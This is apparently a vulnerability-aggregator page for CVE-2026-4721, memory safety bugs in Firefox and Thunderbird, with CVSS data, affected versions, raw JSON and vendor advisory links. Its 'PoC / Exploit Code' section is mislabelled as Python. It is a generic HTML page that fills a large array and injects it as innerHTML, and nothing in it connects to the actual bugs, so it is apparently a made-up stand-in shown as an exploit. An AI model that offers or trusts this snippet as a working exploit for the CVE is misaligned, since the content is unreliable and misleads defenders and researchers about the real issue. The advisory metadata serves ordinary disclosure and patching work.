Security Vulnerability Report
中文
CVE-2026-4721 CVSS 9.8 CRITICAL

CVE-2026-4721

Published: 2026-03-24 13:16:08
Last Modified: 2026-04-13 15:17:44
Source: [email protected]

Description

Memory safety bugs present in Firefox ESR 115.33, Firefox ESR 140.8, Thunderbird ESR 140.8, Firefox 148 and Thunderbird 148. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Firefox ESR < 115.34
Firefox ESR < 140.9
Firefox < 149
Thunderbird ESR < 140.9
Thunderbird < 149

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-4721 This is a generic HTML proof of concept to demonstrate a browser crash triggering memory corruption logic. For educational purposes only. --> <html> <head> <title>CVE-2026-4721 PoC</title> </head> <body> <script> // Attempt to trigger memory corruption via buffer manipulation try { // Simulating a complex object structure that may trigger UAF or Overflow var payload = new Array(0x100000).fill(0x41414141); var trigger = document.createElement('div'); trigger.innerHTML = payload.join(''); document.body.appendChild(trigger); console.log("Payload executed. If vulnerable, browser may crash."); } catch (e) { console.log("Exception occurred: " + e.message); } </script> <h1>CVE-2026-4721 Memory Corruption Test</h1> <p>If this page causes the browser to crash, the system may be vulnerable.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4721", "sourceIdentifier": "[email protected]", "published": "2026-03-24T13:16:07.990", "lastModified": "2026-04-13T15:17:44.200", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory safety bugs present in Firefox ESR 115.33, Firefox ESR 140.8, Thunderbird ESR 140.8, Firefox 148 and Thunderbird 148. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9."}, {"lang": "es", "value": "Errores de seguridad de memoria presentes en Firefox ESR 115.33, Firefox ESR 140.8, Thunderbird ESR 140.8, Firefox 148 y Thunderbird 148. Algunos de estos errores mostraron evidencia de corrupción de memoria y presumimos que, con suficiente esfuerzo, algunos de estos podrían haber sido explotados para ejecutar código arbitrario. Esta vulnerabilidad afecta a Firefox &lt; 149, Firefox ESR &lt; 115.34, Firefox ESR &lt; 140.9, Thunderbird &lt; 149 y Thunderbird &lt; 140.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.34.0", "matchCriteriaId": "063BE653-69B0-4543-9A90-BC7A62C943B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "149.0", "matchCriteriaId": "02F2B82F-E997-4D5F-BBB0-237E4962555B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "128.0", "versionEndExcluding": "140.9.0", "matchCriteriaId": "525DEC0C-BB47-46C6-9AEB-98F27D4685FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.9.0", "matchCriteriaId": "4C0558B1-4113-45A8-8E37-A0793A67AD6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "149.0", "matchCriteriaId": "40FE4697-89F1-46F6-8E28-41883647583B"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/buglist.cgi?bug_id=2013762%2C2015291%2C2016591%2C2016661%2C2016664%2C2017303%2C2017894%2C2018090%2C2018196%2C2018379%2C2019112%2C2022090%2C2022243%2C2022351%2C2022478%2C2022676", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-20/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-21/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-22/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-23/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-24/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.